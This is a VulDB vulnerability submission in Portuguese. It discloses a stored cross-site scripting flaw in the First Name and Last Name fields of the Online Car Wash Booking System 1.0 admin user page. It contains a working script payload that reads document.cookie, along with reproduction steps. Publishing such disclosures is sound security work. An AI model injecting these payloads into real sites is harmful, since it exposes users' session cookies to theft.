| Título | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| Descrição | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
`
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows to inject Arbitrary JavaScript in Edit in "First Name" and "Last Name".
`
Payload used:-
<script>confirm (document.cookie)</script>
`
Parameter":-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
`
Steps to reproduce:-
1. Login into your admin account
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add an new user
3. In that "First Name" and " Last Name " parameter put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| Utilizador | Anonymous User |
|---|
| Submissão | 25/05/2024 15h19 (há 2 anos) |
|---|
| Moderação | 25/05/2024 20h27 (5 hours later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name Script de Site Cruzado] |
|---|
| Pontos | 17 |
|---|